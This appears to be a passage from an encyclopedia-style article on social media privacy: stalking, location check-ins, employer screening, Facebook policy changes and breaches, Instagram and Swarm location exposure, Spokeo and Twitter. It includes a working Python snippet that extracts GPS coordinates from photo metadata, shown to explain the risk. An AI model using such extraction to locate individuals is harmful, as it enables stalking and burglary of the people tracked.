as well.[63] Consequently, they continue to use social media sites such as Facebook, despite knowing there exist potential privacy risks.[64]

California is also taking steps to protect the privacy of some social media users from users' own judgments.
In 2013, California enacted a law that would require social media sites to allow young registered users to erase their own comments from sites.[65] This is a first step in the United States toward the "right to be forgotten" that has been debated around the world over the past decade.

Most major social networking sites are committed to ensuring that use of their services is as safe as possible. However, due to the high content of personal information placed on social networking sites, as well as the ability to hide behind a pseudo-identity, such sites have become increasingly popular for sexual predators online.[66] Further, the lack of age verification mechanisms is a cause for concern on these social networking platforms.[67] However, it was also suggested that the majority of these simply transferred to using the services provided by Facebook.[68] While the numbers may remain small, it has been noted that the number of sexual predators caught using social networking sites has been increasing, and has now reached an almost weekly basis.[69] In the worst cases, children have become victims of pedophiles or been lured to meet strangers. They say that sexual predators can lurk anonymously through the wormholes of cyberspace and access victim profiles online.[70] A number of highly publicized cases have demonstrated the threat posed to users, such as Peter Chapman who, under a false name, added over 3,000 friends and went on to rape and murder a 17-year-old girl in 2009.[71] In another case, a 12-year-old girl from Evergreen was safely found by the FBI with the help of Facebook, after her mother learned of her daughter's conversation with a man she had met on the popular social networking application.

The potential for stalking users on social networking sites has been noted and shared. Popular social networking sites make it easy to build a web of friends and acquaintances and share with them your photos, whereabouts, contact information, and interests without ever getting the chance to actually meet them. With the amount of information that users post about themselves online, it is easy for users to become a victim of stalking without even being aware of the risk. 63% of Facebook profiles are visible to the public, meaning that if you Google someone's name and add "+Facebook" in the search bar, you will see most of the person's profile.[72] A study of Facebook profiles from students at Carnegie Mellon University revealed that about 800 profiles included the current residence and at least two classes being studied, theoretically allowing viewers to know the precise location of individuals at specific times.[50] AOL attracted controversy over its instant messenger AIM, which permits users to add 'buddies' without their knowledge and therefore track when a user is online.[50] Concerns have also been raised over the relative ease with which people can read private messages or e-mails on social networking sites.[73] Cyberstalking is a criminal offense that comes into play under state anti-stalking laws, slander laws, and harassment laws. A cyberstalking conviction can result in a restraining order, probation, or even criminal penalties against the assailant, including jail.[72]

Some applications are explicitly centered on "cyber stalking." An application named "Creepy" can track a person's location on a map using photos uploaded to Twitter or Flickr. When a person uploads photos to a social networking site, others are able to track their most recent location.
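The mechanism such applications exploit, elaborated below, is the GPS metadata many cameras and phones embed in image files. As a minimal, hedged sketch of the idea (using the third-party Pillow library; "photo.jpg" is a placeholder filename), the coordinates can be read directly from a photo's EXIF tags:

```python
# A minimal sketch of reading embedded GPS coordinates from a photo's
# EXIF metadata with the Pillow library ("photo.jpg" is a placeholder).
from PIL import Image

GPS_IFD = 0x8825  # standard EXIF pointer to the GPS info block

def to_degrees(dms, ref):
    """Convert EXIF (degrees, minutes, seconds) rationals to a signed float."""
    degrees = float(dms[0]) + float(dms[1]) / 60 + float(dms[2]) / 3600
    return -degrees if ref in ("S", "W") else degrees

exif = Image.open("photo.jpg").getexif()
gps = exif.get_ifd(GPS_IFD)

if gps:
    # Tag numbers from the EXIF spec: 1/2 latitude ref/value, 3/4 longitude.
    lat = to_degrees(gps[2], gps[1])
    lon = to_degrees(gps[4], gps[3])
    print(f"This photo was taken at ({lat:.5f}, {lon:.5f})")
else:
    print("No GPS metadata embedded in this photo.")
```

The corresponding defense is to strip such metadata before uploading; many platforms now remove it server-side, but the original file on the device still carries it.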
Some smartphones are able to embed the longitude and latitude coordinates into the photo and automatically send this information to the application. Anybody using the application can search for a specific person and then find their immediate location. This poses many potential threats to users who share their information with a large group of followers.[74]

Facebook "Places" is a Facebook service which publicizes user location information to the networking community. Users are allowed to "check in" at various locations including retail stores, convenience stores, and restaurants. Also, users are able to create their own "place," disclosing personal information onto the Internet. This form of location tracking is automated and must be turned off manually. Various settings must be turned off and manipulated in order for the user to ensure privacy. According to epic.org, Facebook users are recommended to: (1) disable "Friends can check me in to Places," (2) customize "Places I Check In," (3) disable "People Here Now," and (4) uncheck "Places I've Visited."[75] Moreover, the Federal Trade Commission has received two complaints regarding Facebook's "unfair and deceptive" trade practices, which are used to target advertising sectors of the online community. "Places" tracks user location information and is used primarily for advertising purposes. Each location tracked allows third-party advertisers to customize advertisements that suit one's interests. Currently, the Federal Trade Commissioner, along with the Electronic Privacy Information Center, is shedding light on the issues of location data tracking on social networking sites.[75]

Unintentional fame can harm a person's character, reputation, relationships, chance of employment, and privacy, ultimately infringing upon a person's right to the pursuit of happiness. Many cases of unintentional fame have led its victims to take legal action. The right to be forgotten is a legal concept that includes removing one's information from media that was once available to the public. The right to be forgotten is currently enforced in the European Union and Argentina, and has been recognized in various cases in the United States, particularly in the case of Melvin v. Reid. However, there is controversy surrounding the right to be forgotten in the United States as it conflicts with the public's right to know and the Constitution's First Amendment, restricting one's "right to freedom of speech and freedom of expression" (Amendment I).

Privacy concerns have also been raised over a number of high-profile incidents which can be considered embarrassing for users. Various internet memes have been started on social networking sites or been used as a means towards their spread across the internet. In 2002, a Canadian teenager became known as the Star Wars Kid after a video of him using a golf club as a light sabre was posted on the internet without his consent. The video quickly became a hit, much to the embarrassment of the teenager, who claims to have suffered as a result.[76] Along with other incidents of videos being posted on social networking sites, this highlights the ability for personal information to be rapidly transferred between users.

Issues relating to privacy and employment are becoming a concern with regard to social networking sites.
As of 2008, it had been estimated by CareerBuilder.com that one in five employers search social networking sites in order to screen potential candidates (increasing from only 11% in 2006).[77] For the majority of employers, such action is taken to acquire negative information about candidates. For example, 41% of managers considered information relating to candidates' alcohol and drug use to be a top concern.[77] Other concerns investigated via social networking sites included poor communication skills, inappropriate photographs, inaccurate qualifications and bad-mouthing former employers or colleagues.[77] However, 24% of managers claimed that information found on a social networking site persuaded them to hire a candidate, suggesting that a user's image can be used in a positive way.

While there is little doubt that employers will continue to use social networking sites as a means of monitoring staff and screening potential candidates, it has been noted that such actions may be illegal in some jurisdictions. According to Workforce.com, employers who use Facebook or Myspace could potentially face legal action: if a potential employer uses a social networking site to check out a job candidate and then rejects that person based on what they see, he or she could be charged with discrimination.[78] On August 1, 2012, Illinois joined the state of Maryland (law passed in March 2012) in prohibiting employer access to the social media web sites of their employees and prospective employees. A number of other states are also considering such prohibitory legislation (California, Delaware, Massachusetts, Michigan, Minnesota, Missouri, New Jersey, New York, Ohio, South Carolina and Washington), as is the United States Congress. In April 2012, the Social Networking Online Protection Act (2012 H.R. 5050) was introduced in the United States House of Representatives, and the Password Protection Act of 2012 (2012 S. 3074) was introduced in the United States Senate in May 2012; both prohibit employers from requiring access to their employees' social media web sites.[79]

With the recent concerns about new technologies, the United States is now developing laws and regulations to protect certain aspects of people's information on different media. For example, 12 states in the US currently have laws specifically restricting employers from demanding access to their employees' social media sites when those sites are not fully public.[80] (The states that have passed these laws are Arkansas, California, Colorado, Illinois, Maryland, Michigan, New Jersey, New Mexico, Nevada, Oregon, Utah, and Washington.)[81]

Monitoring of social networking sites is not limited to potential workers. Issues relating to privacy are becoming an increasing concern for those currently in employment. A number of high-profile cases have appeared in which individuals have been sacked for posting comments on social networks which have been considered disparaging to their current employers or fellow workers. In 2009, sixteen-year-old Kimberley Swann was sacked from her position at Ivell Marketing and Logistics Limited after describing her job as 'boring'.[82] In 2008, Virgin Atlantic sacked thirteen cabin crew staff after it emerged that they had criticized the company's safety standards and called passengers 'chavs' on Facebook.[83] There is no federal law that we are aware of that an employer is breaking by monitoring employees on social networking sites. In fact, employers can even hire third-party companies to monitor online employee activity for them.
According to an article by ReadWriteWeb, employers use the service to "make sure that employees don't leak sensitive information on social networks or engage in any behavior that could damage a company's reputation."[51] While employers may have found such usage of social networking sites convenient, complaints have been put forward by civil liberties groups and trade unions about the invasive approach adopted by many employers. In response to the Kimberley Swann case, Brendan Barber of the TUC union stated: "Most employers wouldn't dream of following their staff down the pub to see if they were sounding off about work to their friends," he said. "Just because snooping on personal conversations is possible these days, it doesn't make it healthy."

Monitoring of staff's social networking activities is also becoming an increasingly common method of ensuring that employees are not browsing websites during work hours. It was estimated in 2010 that an average of two million employees spent over an hour a day on social networking sites, costing potentially £14 billion.[84]

A male burglar in Orange County, California in 2015 targeted 33 women by using GPS data embedded in Facebook and Instagram photos, and stole $250,000 in electronics and jewelry, along with his victims' underwear and bras.[85] A former burglar probed social media to determine when his victims were away, by looking for photos suggesting a vacation. Instagram posts showing expensive new products have been used by thieves to find victims, along with posts featuring new homes showing their address.[86] A survey in the United Kingdom showed that 78% of burglars have used Facebook and Twitter to find victims.[87][88][89]

Social networks are designed for individuals to socially interact with other people over the Internet. However, some individuals engage in undesirable online social behaviors, which negatively impact other people's online experiences. This has created a wide range of online interpersonal victimization. Some studies have shown that social network victimization appears largely among adolescents and teens, and the types of victimization include sexual advances and harassment.[90] Recent research has reported that approximately 9% of online victimization involves social network activities.[90] It has been noted that many of these victims are girls who have been sexually victimized over these social network sites.[90] Research concludes that many social network victimizations are associated with user behaviors and interaction with one another. Negative social behaviors such as aggressive attitudes and discussing sexual topics motivate the offenders to achieve their goals.[90] All in all, positive online social behavior is promoted to help reduce and avoid online victimization.

While the concept of a worldwide communicative network seems to adhere to the public sphere model, market forces control access to such a resource.
In 2010, an investigation by The Wall Street Journal found that many of the most popular applications on Facebook were transmitting identifying information about users and their friends to advertisers and internet tracking companies, which is a violation of Facebook's privacy policy.[91] The Wall Street Journal analyzed the ten most popular Facebook apps, including Zynga's FarmVille with 57 million users and Zynga's Mafia Wars with 21.9 million users, and found that they were transmitting Facebook user IDs to data aggregators.[91] Every online move leaves cyber footprints that are rapidly becoming fodder for research without people ever realizing it. Using social media for academic research is accelerating and raising ethical concerns along the way, as vast amounts of information collected by private companies — including Google, Microsoft, Facebook and Twitter — are giving new insight into all aspects of everyday life. Our social media "audience" is bigger than we actually know; our followers or friends aren't the only ones that can see information about us. Social media sites are collecting data from us just by our searching something such as "favorite restaurant" on a search engine. "Facebook is transformed from a public space to a behavioral laboratory," says one study, which cites a Harvard-based research project on 1,700 college-based Facebook users in which it became possible to "deanonymize parts of the data set," or cross-reference anonymous data to make student identification possible.[92] Some of Facebook's research on user behavior found that 71% of people drafted at least one post that they never posted.[92] Another study analyzed 400,000 posts and found that children's communication with parents decreases in frequency from age 13 but then rises when they move out.[92]

The FBI has dedicated undercover agents on Facebook, Twitter, MySpace, and LinkedIn. One example of investigators using Facebook to nab a criminal is the case of Maxi Sopo. Charged with bank fraud and having escaped to Mexico, he was nowhere to be found until he started posting on Facebook. Although his profile was private, his list of friends was not, and through this vector, where he met a former official of the Justice Department, he was eventually caught.[93][94]

In recent years, some state and local law enforcement agencies have also begun to rely on social media websites as resources. Although obtaining records of information not shared publicly by or about site users often requires a subpoena, public pages on sites such as Facebook and MySpace offer access to personal information that can be valuable to law enforcement.[95] Police departments have reported using social media websites to assist in investigations, locate and track suspects, and monitor gang activity.[96][97]

On October 18, 2017, the Department of Homeland Security (DHS) was scheduled to begin using personal information collected using social media platforms to screen immigrants arriving in the U.S. The department made this new measure known in a posting to the Federal Register in September 2017, noting that "...social media handles, aliases, associated identifiable information and search results..." would be included in an applicant's immigration file.[98] This announcement, which was made relatively quietly, has received criticism from privacy advocates.
The Department of Homeland Security issued a statement in late September 2017 asserting that the planned use of social media is nothing new, with one department spokesperson saying DHS has been using social media to collect information for years. According to a statement made to National Public Radio, DHS uses "...social media handles, aliases, associated identifiable information, and search results" to keep updated records on persons of interest.[99] According to the DHS, the posting to the Federal Register was an effort to be transparent regarding information about social media that is already being collected from immigrants.

Government use of SMMS, or "social media monitoring software", may geographically track us as we communicate. It can chart out our relationships, networks, and associations. It can monitor protests, identify the leaders of political and social movements, and measure our influence.[100] SMMS is also a growing industry. SMMS "products like XI Social Discovery, Geofeedia, Dataminr, Dunami, and SocioSpyder (to name just a few) are being purchased in droves by Fortune 500 companies, politicians, law enforcement, federal agencies, defense contractors, and the military. Even the CIA has a venture fund, In-Q-Tel, that invests in SMMS technology."[100]

The idea of 'mob rule' can be described as a situation in which control is held by those outside the conventional or lawful realm. In response to the News International phone hacking scandal involving News of the World in the United Kingdom, a report was written to enact new media privacy regulations. The British author of the Leveson Report on the ethics of the British press, Lord Justice Leveson, has drawn attention to the need to take action on protecting privacy on the internet. He describes this phenomenon as a global megaphone for gossip: "There is not only a danger of trial by Twitter, but also of an unending punishment, and no prospect of rehabilitation, by Google".[101]

Foursquare, Facebook, and Loopt are applications which allow users to check in, and this capability allows users to share their current location information with their connections. Some users even update their travel plans on social networking applications. However, the disclosure of location information within these networks can cause privacy concerns among mobile users. Foursquare defines another framework of action for the user. It appears to be in the interest of Foursquare that users provide much personal data that is set as public. This is illustrated, among other things, by the fact that, although all the respondents want high control over their (location) privacy settings, almost none of them ever checked the Foursquare privacy settings before.[102] Although there are algorithms using encryption, k-anonymity and noise injection, it is better to understand how location sharing works in these applications to see if they have good algorithms in place to protect location privacy.[103]

Another privacy issue with social networks is the privacy agreement. The privacy agreement states that the social network owns all of the content that users upload. This includes pictures, videos, and messages, which are all stored in the social network's database even if the user decides to terminate his or her account.[104]

Privacy agreements oftentimes say that they can track a user's location and activity based on the device used for the site.
For example, the privacy agreement for Facebook states that "all devices that a person uses to access Facebook are recorded, such as IP addresses, phone numbers, operating system and even GPS locations".[105] One main concern about privacy agreements is their length, because they take a lot of time to fully read and understand. Most privacy agreements state the most important information at the end because it is assumed that people will not read it completely.

The ethical dilemma lies in the fact that, upon agreeing to register for SNSs, the personal information disclosed is legally accessible and managed by the sites' privately established online security operators and operating systems, leaving access to user data "at the discretion" of the site operators. This gives rise to a moral obligation and responsibility of the site operators to keep private information within user control. However, because outsourcing of user data upon registration is legal and requires no prior discretion, data outsourcing has been frequent in SNS operating systems, regardless of user privacy settings.[106]

Data outsourcing has been proven to be consistently exploited since the emergence of SNSs. Employers have often been found to hire individuals or companies to search deep into the SNS user database to find "less than pleasant" information regarding applicants during the review process.[107]

One of the main concerns that people have with their security is the lack of visibility of policies and settings in the social networks. They are often located in areas hard to see, like the top left or right of the screen. Another concern is the lack of information that users get from the companies when there is a change in their policies. They always inform users about new updates, but it is difficult to learn what these changes actually are.[108]

Most social networking sites require users to agree to Terms of Use policies before they use their services. Controversially, these Terms of Use declarations that users must agree to often contain clauses permitting social networking operators to store data on users, or even share it with third parties. Facebook has attracted attention over its policies regarding data storage, such as making it difficult to delete an account, holding onto data after an account is de-activated, and being caught sharing personal data with third parties.[109] This section explains how to read the privacy statement in the terms and conditions while signing up for any social networking site.[110]

What to look for in the privacy policy: the answers to these questions will give an indication of how safe the social networking site is.

There are people out there who want—and will do just about anything—to get someone's private information. It is essential to realize that it is difficult to keep your privacy secured all the time.[111] Among other factors, it has been observed that data loss correlates positively with risky online behavior and with forgoing the necessary antivirus and anti-spyware programs to defend against breaches of private information via the internet.[112]

Logging off after every session can help protect account security. It is dangerous to stay logged in on a device, since others may have access to your social profiles while you are not paying attention.[113] Full names and addresses are typically considered personal information.
Children's safety may be compromised if their parents post their whereabouts on a site where others know their real identities.[114]

Read the social networking site's fine print. Many sites push their users to agree to terms that are best for the sites—not the users.[111] Users should be aware of the terms in case of emergencies; exactly how to read the terms is explained above in the "Reading a Privacy Statement in Terms and Conditions" part. Make sure the social networking site is safe before sharing information. Users shouldn't share information if they don't know who is using the website, since their personally identifiable information could be exposed to other users of the site.[114] Be familiar with the privacy protection provided. Users should take the extra time to get to know the privacy protection systems of the various social networks they are or will be using. Only friends should be allowed to access their information.[113] Check the privacy or security settings on every social networking site that they might have to use.[115]

Encrypt devices. Users should use complex passwords on their computers and cell phones and change them from time to time. This will protect users' information in case these devices are stolen.[113] Install anti-virus software. Others could use viruses and other means to invade a user's computer if he or she installed something unsafe.[116] Use devices that can disable the camera and microphone, which are often used for privacy invasion.

Users' privacy may be threatened by any number of actions; the following need special attention. (1) Adding a new friend: Facebook reports that 8.7% of its total profiles are fake, so a user should be sure about who a person is before adding them as a new friend.[113] (2) Clicking on links: many links which look attractive, like gift cards, are specially designed by malicious users, and clicking on these links may result in losing personal information or money.[113] (3) Think twice about posting revealing photos: a revealing photo could attract the attention of potential criminals.[111]

Facebook has been scrutinized for a variety of privacy concerns due to changes in its privacy settings generally over time, as well as privacy concerns within Facebook applications. When Mark Zuckerberg, CEO of Facebook, first launched Facebook[117] in 2004, it was focused on universities and only those with a .edu address could open an account. Furthermore, only those within one's university network could see their page. Some argue that initial users were much more willing to share private information for these reasons. As time went on, Facebook became more public, allowing those outside universities, and furthermore, those without a specific network, to join and see pages of those in networks that were not their own. In 2006, Facebook introduced the News Feed, a feature that would highlight recent friend activity. By 2009, Facebook made "more and more information public by default". For example, in December 2009, "Facebook drastically changed its privacy policies, allowing users to see each others' lists of friends, even if users had previously indicated they wanted to keep these lists private". Also, "the new settings made photos publicly available by default, often without users' knowledge".[118]

Facebook recently updated its profile format, allowing people who are not "friends" of others to view personal information about other users, even when the profile is set to private.
However, as of January 18, 2011, Facebook reversed its decision to make home addresses and telephone numbers accessible to third-party members; it is still possible, though, for third parties to access less exact personal information, like one's hometown and employment, if the user has entered the information into Facebook. EPIC Executive Director Marc Rotenberg said, "Facebook is trying to blur the line between public and private information. And the request for permission does not make clear to the user why the information is needed or how it will be used."[119]

Breakup Notifier is an example of a Facebook "cyberstalking"[120] app, which was taken down on 23 February 2011.[121] The app was later unblocked.[122] The application notifies the user when the person they selected changes their relationship status.[123] The concept became very popular, with the site attracting 700,000 visits in the first 36 hours and the app being downloaded 40,000 times. Before the app was blocked, it had more than 3.6 million downloads and 9,000 Facebook likes.[120][121]

In 2008, four years after Facebook's launch, Facebook created an option to permanently delete information. Until then, the only option was to deactivate one's Facebook account, which still left the user's information on Facebook's servers. After thousands of user complaints, Facebook obliged and created a tool, located in the Help section but later removed. To permanently delete an account, a user must manually search Facebook's Help section for the deletion request; only then is a link provided prompting the user to delete his or her profile.[124]

These new privacy settings enraged some users, one of whom claimed, "Facebook is trying to dupe hundreds of millions of users they've spent years attracting into exposing their data for Facebook's personal gain." However, other features like the News Feed faced an initial backlash but later became a fundamental and much appreciated part of the Facebook experience. In response to user complaints, Facebook continued to add more privacy settings, resulting in "50 settings and more than 170 privacy options." However, many users complained that the new privacy settings were too confusing and were aimed at increasing the amount of public information on Facebook. Facebook management responded that "there are always trade-offs between providing comprehensive and precise granular controls and offering simple tools that may be broad and blunt."[118] It appears that users sometimes do not pay enough attention to privacy settings and arguably allow their information to be public even though it is possible to make it private. Studies have shown that users actually pay little attention to "permissions they give to third party apps."[125]

Most users are not aware that they can modify the privacy settings and, unless they modify them, their information is open to the public. On Facebook, privacy settings can be accessed via the drop-down menu under Account in the top right corner. There, users can change who can view their profile and what information can be displayed on it.[104] In most cases profiles are open to either "all my network and friends" or "all of my friends."
Also, information that shows on a user's profile, such as birthday, religious views, and relationship status, can be removed via the privacy settings.[126] Users under 13 years old are not permitted to make a Facebook or MySpace account; however, this is not regulated.[104]

Although Zuckerberg, the Facebook CEO, and others in the management team usually respond in some manner to user concerns, they have been unapologetic about the trend towards less privacy. They have stated that they must continually "be innovating and updating what our system is to reflect what the current social norms are." Their statements suggest that the Internet is becoming a more open, public space, and changes in Facebook privacy settings reflect this. However, Zuckerberg did admit that in the initial release of the News Feed, they "did a bad job of explaining what the new features were and an even worse job of giving you control of them."[118]

Facebook's privacy settings have greatly evolved and continue to change over time. Zuckerberg "believes the age of privacy is 'over,' and that norms have evolved considerably since he first co-founded the social networking site".[127] Additionally, Facebook has been under fire for tracking users' Internet usage whether they are logged into the social media site or not. A user may notice personalized ads under the 'Sponsored' area of the page. "The company uses cookies to log data such as the date, time, URL, and your IP address whenever you visit a site that has a Facebook plug-in, such as a 'Like' button."[128] Facebook claims this data is used to help improve one's experience on the website and to protect against 'malicious' activity. Another privacy issue is Facebook's new facial recognition software, which identifies photos that users are tagged in by developing a template based on one's facial features.

Similar to Rotenberg's claim that Facebook users are unclear about how or why their information has gone public, the Federal Trade Commission and the Commerce Department have recently become involved. The Federal Trade Commission has released a report claiming that Internet companies and other industries will soon need to increase their protection for online users. Because online users often unknowingly opt in to making their information public, the FTC is urging Internet companies to make privacy notices simpler and easier for the public to understand, thereby increasing their option to opt out. Perhaps this new policy should also be implemented in the Facebook world. The Commerce Department claims that Americans "have been ill-served by a patchwork of privacy laws that contain broad gaps".[129] Because of these broad gaps, Americans are more susceptible to identity theft and to having their online activity tracked by others.

Illegal activities are widespread on Facebook, in particular phishing attacks that allow attackers to steal other people's passwords. Facebook users are led to a page where they are asked for their login information, and their personal information is stolen that way. According to an April 22, 2010 report from PC World Business Center, a hacker named Kirllos illegally stole and sold 1.5 million Facebook IDs to business companies wanting to attract potential customers through advertisements on Facebook.
Their illegal approach was to use accounts bought from hackers to send advertisements to users' friends. When friends see the advertisements, they tend to trust them: "People will follow it because they believe it was a friend that told them to go to this link," said Randy Abrams, director of technical education with security vendor Eset.[130] An estimated 2.2232% of the population on Facebook believed or followed the advertisements of their friends.[131] Even though the percentage is small, Facebook has more than 400 million users worldwide, so the influence of advertisements on Facebook is substantial. According to the blog of one advertiser, Alan, who posted advertisements on Facebook, he earned $300 over four days, a return of $3 for every $1 put in (implying roughly $100 spent on the ads).[132] Such profits attract hackers to steal users' login information on Facebook, and business people to buy accounts from hackers in order to send advertisements to users' friends on Facebook.

A leaked document from Facebook revealed that the company was able to identify "insecure, worthless, stressed or defeated" emotions, especially in teenagers, and then proceeded to inform advertisers.[133] While similar issues have arisen in the past, this continues to make individuals' emotional states seem more like a commodity.[133] Advertisers are able to target certain age groups depending on the time their advertisements appear.[133]

Recently, allegations have been made against Facebook accusing the app of listening in on its users through their smartphones' microphones in order to gather information for advertisers. These rumors have been proven to be false as well as impossible. For one, because it does not have a specific wake word to listen for like the Amazon Echo, Facebook would have to record everything its users say. This kind of "constant audio surveillance would produce about 33 times more data daily than Facebook currently consumes".[134] Additionally, it would become immediately apparent to users, as their phones' battery life would be swiftly drained by the power needed to record every conversation. Finally, Facebook does not need to listen in on its users' conversations because it already has ample access to their data and internet search history through cookies. Facebook specifically states in its Cookies Policy that it uses cookies to help display ads that will pique users' interest. It then uses this information to help make recommendations to individuals who may be interested in the products, services, or causes offered by numerous businesses, organizations, and associations.[135]

In September 2018, Facebook suffered a security breach. Hackers were able to access and steal personal information from nearly half of the 30 million affected accounts. The company initially believed that even more, around 50 million users, were affected in an attack that gave the hackers control of accounts.[136]

A study was conducted at Northeastern University by Alan Mislove and his colleagues at the Max Planck Institute for Software Systems, in which an algorithm was created to try to discover personal attributes of a Facebook user by looking at their friends list. The researchers looked for information such as high school and college attended, major, hometown, graduation year, and even which dorm a student may have lived in.
The study revealed that only 5% of people had thought to set their friends list to private. Of the other users, 58% displayed the university they attended, 42% revealed employers, 35% revealed interests, and 19% gave viewers public access to where they were located. Due to the correlation between Facebook friends and the universities they attend, it was easy to discover where a Facebook user was located based on their list of friends. This fact has become very useful to advertisers targeting their audiences, but it is also a big risk for the privacy of all those with Facebook accounts.[137]

Facebook also knowingly agreed to and facilitated a controversial experiment that blatantly bypassed user privacy and demonstrates the dangers and complex ethical nature of the current networking management system. In the "one week study in January of 2012", over 600,000 users were randomly selected to unknowingly partake in a study on the effect of "emotional alteration" by Facebook posts.[138] Apart from the ethical issue of conducting such a study with human emotion in the first place, this is just one of the ways in which data outsourcing has been used as a breach of privacy without user disclosure.[139][107]

Several issues about Facebook are due to privacy concerns. An article titled "Facebook and Online Privacy: Attitudes, Behaviors, and Unintended Consequences" examines the awareness that Facebook users have of privacy issues. This study shows that the gratifications of using Facebook tend to outweigh the perceived threats to privacy. The most common strategy for privacy protection, decreasing profile visibility by restricting access to friends, is also a very weak mechanism: a quick fix rather than a systematic approach to protecting privacy.[140] This study suggests that more education about privacy on Facebook would benefit the majority of the Facebook user population. The study also offers the perspective that most users do not realize that restricting access to their data does not sufficiently address the risks resulting from the amount, quality, and persistence of the data they provide. Although the Facebook users in the study reported familiarity with and use of privacy settings, they still accepted as "friends" people they had only heard of through others or did not know at all; most therefore had very large groups of "friends" with access to widely uploaded information such as full names, birthdates, hometowns, and many pictures.[140] This study suggests that social network privacy does not merely exist within the realm of privacy settings; privacy control is largely in the hands of the user. Commentators have noted that online social networking poses a fundamental challenge to the theory of privacy as control. The stakes have been raised because digital technologies lack "the relative transience of human memory" and can be trolled or data mined for information.[141] For users who are unaware of all privacy concerns and issues, further education on the safety of disclosing certain types of information on Facebook is highly recommended.

Instagram tracks users' photos even if they are not posted with a geotag. This happens through the metadata embedded in all photos, which contains information like the lens type, location, and time of the photo. Users can thus be tracked through metadata without the use of geotags. The app geotags an uploaded image regardless of whether the user chose to share its location or not, so anybody can view the exact location where an image was uploaded on a map.
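To illustrate how much location data ordinary photo metadata carries, here is a minimal sketch that reads GPS coordinates from a JPEG's EXIF tags. It assumes the Pillow imaging library is installed, and the file name is hypothetical; this illustrates photo metadata in general, not Instagram's internal systems.

```python
# Minimal sketch: extracting the GPS position a camera embeds in a photo.
# Assumes Pillow (pip install Pillow); "vacation.jpg" is a hypothetical file.
from PIL import Image
from PIL.ExifTags import TAGS, GPSTAGS

def extract_gps(path):
    # _getexif() returns the raw EXIF tag dictionary for JPEG files
    exif = Image.open(path)._getexif() or {}
    labeled = {TAGS.get(tag, tag): value for tag, value in exif.items()}
    gps = {GPSTAGS.get(tag, tag): value
           for tag, value in labeled.get("GPSInfo", {}).items()}
    if not gps:
        return None  # no location stored in this photo

    def to_degrees(dms):
        # EXIF stores coordinates as (degrees, minutes, seconds) rationals
        d, m, s = (float(v) for v in dms)
        return d + m / 60 + s / 3600

    lat = to_degrees(gps["GPSLatitude"])
    lon = to_degrees(gps["GPSLongitude"])
    if gps.get("GPSLatitudeRef") == "S":
        lat = -lat
    if gps.get("GPSLongitudeRef") == "W":
        lon = -lon
    return lat, lon

print(extract_gps("vacation.jpg"))  # e.g. (48.8584, 2.2945), a mappable point
```

A few lines of standard tooling are enough to turn one shared photo into a pin on a map, which is why stripping metadata before upload is a common privacy recommendation.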
Such location exposure is concerning because most people upload photos from their home or other locations they frequent, and the ease with which locations are shared raises privacy concerns about stalking and about sexual predators being able to find a target in person after discovering them online.[142] The Search function on Instagram combines the search of places, people, and tags to look at nearly any location on earth, allowing users to scout out a vacation spot, look inside a restaurant, and even experience an event as if they were there in person.[143] The privacy implication is that people, companies, and governments can now see into every corner of the world, every culture, and people's private lives. Additionally, when someone searches a specific location or place through these features, Instagram shows them the personal photos its users have posted, along with the likes and comments on those photos, regardless of whether the poster's account is private or not. With these features, complete strangers, businesses, and governments can see aspects of Instagram users' private lives. The Search and Explore pages that collect data based on user tagging illustrate how Instagram was able to create value out of the databases of information it collects on users throughout its business operations.[143]

Swarm is a mobile app that lets users check in to a location and potentially make plans and set up future meetings with people nearby. The app has made it easier for people in online communities to share their locations and interact with others in these communities, collecting rewards such as coins and stickers through competitions with other users.[144] If a user is on Swarm, their exact location may be broadcast even if they did not select their location to be "checked in." When users turn on the "Neighborhood Sharing" feature, their location is shared as the specific intersection they are at, and this location can be viewed in real time simply by tapping their profile image.[142] This is concerning because Swarm users may believe they are being discreet by sharing only which neighborhood they are in, while in fact they are sharing the exact pinpoint of their location.[142] People are thus inadvertently sharing their exact location without knowing it. This plays into the privacy concerns of social media in general, because it makes it easier for other users, and for the companies this location data is shared with, to track Swarm members. Such tracking makes it easier for people to find their next targets for identity theft, stalking, and sexual harassment.

Spokeo is a "people-related" search engine with results compiled through data aggregation. The site contains information such as age, relationship status, estimated personal wealth, immediate family members, and home addresses of individual people. This information is compiled from what is already on the internet or in other public records, but the website does not guarantee accuracy. Spokeo has faced potential class-action lawsuits from people who claim that the organization breaches the Fair Credit Reporting Act. In September 2010, Jennifer Purcell claimed that the FCRA was violated by Spokeo marketing her personal information. Her case is pending in court.
Also in 2010, Thomas Robins claimed that his personal information on the website was inaccurate and that he was unable to edit it for accuracy. The case was dismissed because Robins did not claim that the site directly caused him actual harm.[145] On February 15, 2011, Robins filed another suit, this time stating that Spokeo had caused him "imminent and ongoing" harm.[146]

In January 2011, the US government obtained a court order to force the social networking site Twitter to reveal information about certain subscribers involved in the WikiLeaks cases. The outcome of this case is questionable because it deals with the user's First Amendment rights. Twitter moved to reverse the court order, supporting the idea that internet users should be notified and given an opportunity to defend their constitutional rights in court before those rights are compromised.[147]

Twitter's privacy policy states that information is collected through its different websites, applications, SMS, services, APIs, and other third parties. When users use Twitter's service, they consent to the collection, transfer, storage, manipulation, disclosure, and other uses of this information. In order to create a Twitter account, one must give a name, username, password, and email address. Any other information added to one's profile is completely voluntary.[148] Twitter's servers automatically record data such as IP address, browser type, the referring domain, pages visited, mobile carrier, device and application IDs, and search terms. Any common account identifiers, such as full IP address or username, are removed or deleted after 18 months.[149]

Twitter allows people to share information with their followers. Any messages that are not switched from the default privacy setting are public and can thus be viewed by anyone with a Twitter account. The most recent 20 tweets are posted on a public timeline.[150] Despite Twitter's best efforts to protect its users' privacy, personal information can still be dangerous to share. There have been incidents of leaked tweets on Twitter: tweets published from a private account that have been made public. This occurs when friends of someone with a private account retweet, or copy and paste, that person's tweet, and so on until the tweet is made public. This can make private information public and could be dangerous.[151]

Another privacy issue on Twitter involves users unknowingly disclosing their information through tweets. Twitter attaches location services to tweets, which some users do not even know are enabled. Many users tweet about being at home and attach their location to the tweet, revealing their personal home address. This information is represented as a latitude and longitude, which is completely open for any website or application to access. People also tweet about going on vacation, giving the times and places of where they are going and how long they will be gone. This has led to numerous break-ins and robberies.[152] Twitter users can avoid location services by disabling them in their privacy settings.
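As a sketch of how openly that latitude and longitude travel with a tweet, the snippet below parses the GeoJSON-style "coordinates" field that Twitter's API has historically exposed on geotagged tweets. The tweet object and its values are invented for illustration.

```python
# Minimal sketch: a geotagged tweet carries plain longitude/latitude that
# any consumer of the data can read. The JSON below is invented, modeled
# on the GeoJSON-style field Twitter's API has used for tweet locations.
import json

tweet = json.loads("""
{
  "text": "Home at last!",
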